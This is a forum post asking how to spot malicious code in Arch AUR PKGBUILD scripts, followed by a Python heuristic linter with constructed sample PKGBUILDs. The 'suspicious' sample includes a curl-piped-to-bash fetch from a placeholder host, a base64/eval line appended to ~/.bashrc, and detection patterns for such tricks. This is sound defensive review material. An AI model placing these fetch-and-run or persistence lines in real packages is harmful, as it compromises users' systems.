TL;DR Got tips on specifics to be on the lookout for when scrutinizing a PKGBUILD script?
= = = = = = = = = = = = =
In reaction to the malicious AUR package news, deeper dives into PKGBUILD scripts become ever more imperative. I’ve often previewed PKGBUILDs before installing a new app, but confess that too much of what I’m reviewing goes over my head, leaving me feeling ill-prepared.
So instead, I’ve primarily been relying upon things like: the age of the app, # of contributors, responsiveness to PRs and open issues, star ratings, and the like. In other words, I’ve relied upon “social” screening rather than “technical” screening.
Having read through Arch and EOS wikis several times over the years (and googled around a bit), it’s hard to find summary top-level explanations as to spotting specific things within the PKGBUILD scripts that ought to be of concern.
Anyone got sources/links worth reading to get smarter about this topic?
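One way to turn the usual PKGBUILD review checklist into something repeatable is a small heuristic linter. The script below is an added example written for this thread, not code from the original post, from Arch, or from any AUR helper; the two PKGBUILDs it scans are constructed samples (the `example.invalid` hostnames and the placeholder checksum are made up), and the finding names are my own labels. It flags the things a reviewer normally looks for by hand: sources fetched over plain `http://`/`git://`, non-VCS sources whose checksum is `SKIP`, VCS sources that are not pinned to a `#commit=` or `#tag=`, network fetches or pipes into a shell inside `build()`/`package()`, `base64 -d`/`eval` style obfuscation, writes to paths outside `$pkgdir`, and `systemctl`/`sudo`/setuid-style commands.

```python
import re
from dataclasses import dataclass

# --- constructed samples (not real AUR packages) ---------------------------
SUSPICIOUS_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
url="https://example.invalid/example-tool"
source=("http://example.invalid/example-tool-$pkgver.tar.gz"
        "git+https://example.invalid/helper.git#branch=main")
sha256sums=('SKIP' 'SKIP')

build() {
  cd "$srcdir/example-tool-$pkgver"
  curl -s http://example.invalid/setup.sh | bash
  make
}

package() {
  cd "$srcdir/example-tool-$pkgver"
  make DESTDIR="$pkgdir" install
  echo 'eval "$(echo ZWNobyBoaQ== | base64 -d)"' >> ~/.bashrc
  systemctl enable example-tool.service
}
"""

BENIGN_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$srcdir/example-tool-$pkgver"
  make
}

package() {
  cd "$srcdir/example-tool-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

VCS_PREFIXES = ("git+", "git://", "hg+", "svn+", "bzr+", "fossil+")

# Patterns applied line by line inside build()/package()/prepare()/etc.
FUNCTION_PATTERNS = {
    # anything downloaded at build time bypasses the source=/checksum arrays
    "network-in-build": re.compile(r"\b(?:curl|wget|git\s+clone|pip\s+install|npm\s+install)\b"),
    "pipe-to-shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    "obfuscation": re.compile(r"\bbase64\s+(?:-d|--decode)\b|\beval\b|\bxxd\s+-r\b|\bopenssl\s+enc\b"),
    "service-or-privilege": re.compile(r"\bsystemctl\b|\bsudo\b|\bsetcap\b|\bcrontab\b|\bchmod\s+\S*[+=]\S*s"),
}
WRITE_VERB = re.compile(r">>|(?<!\w)>|\b(?:cp|mv|tee|install|ln|sed\s+-i)\b")
# a write target outside the package staging area: home dirs or live system paths
OUTSIDE_PKGDIR = re.compile(r"(?:^|[\s\"'=])(?:~|\$HOME|/etc/|/usr/|/home/|/root/|/var/|/opt/)")
# "$pkgdir/usr/bin" and "${srcdir}/..." are legitimate; strip them before checking
PKGDIR_REF = re.compile(r"\$\{?(?:pkgdir|srcdir)\}?[^\s\"']*")


@dataclass
class Finding:
    category: str
    detail: str
    where: str  # "source" or the PKGBUILD function name


def _bash_array(text, name_re):
    """Return the unquoted items of a top-level bash array such as source=(...)."""
    m = re.search(rf"^(?:{name_re})=\((.*?)\)", text, re.S | re.M)
    return [tok.strip("'\"") for tok in m.group(1).split()] if m else []


def _functions(text):
    """Yield (name, body) for name() { ... } blocks whose closing brace is at column 0."""
    return re.findall(r"^(\w+)\s*\(\)\s*\{\n(.*?)^\}", text, re.S | re.M)


def audit_pkgbuild(text):
    findings = []
    sources = _bash_array(text, r"source(?:_\w+)?")
    sums = _bash_array(text, r"(?:sha\d+|md5|b2)sums(?:_\w+)?")
    for i, src in enumerate(sources):
        url = src.split("::", 1)[1] if "::" in src else src  # "name::url" renames the download
        is_vcs = url.startswith(VCS_PREFIXES)
        if re.match(r"(?:http|ftp|git)://", url):
            findings.append(Finding("insecure-transport", url, "source"))
        if is_vcs and not re.search(r"#(?:commit|tag)=", url):
            findings.append(Finding("unpinned-vcs", url, "source"))
        # SKIP is normal for VCS sources; for a tarball it means nothing is verified
        if not is_vcs and (i >= len(sums) or sums[i] == "SKIP"):
            findings.append(Finding("unverified-source", url, "source"))
    for fname, body in _functions(text):
        for line in body.splitlines():
            code = re.split(r"\s#", line, 1)[0].strip()  # drop trailing comments (naive about quotes)
            if not code:
                continue
            for cat, pat in FUNCTION_PATTERNS.items():
                if pat.search(code):
                    findings.append(Finding(cat, code, fname))
            if WRITE_VERB.search(code) and OUTSIDE_PKGDIR.search(PKGDIR_REF.sub("", code)):
                findings.append(Finding("writes-outside-pkgdir", code, fname))
    return findings


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_PKGBUILD), ("benign", BENIGN_PKGBUILD)):
        print(f"== {label}: {len(audit_pkgbuild(text))} finding(s)")
        for f in audit_pkgbuild(text):
            print(f"  [{f.category}] in {f.where}: {f.detail}")
```

Run it against a PKGBUILD you have just fetched (`audit_pkgbuild(open("PKGBUILD").read())`) and read every flagged line in context. It is a screening aid, not a verdict: a legitimate package can trip `service-or-privilege` or `writes-outside-pkgdir`, and a hostile one can hide in the tarball, the patches or the `.install` file shipped alongside the PKGBUILD, none of which this script opens. That is why the heuristics are worth pairing with the "social" checks mentioned above rather than replacing them.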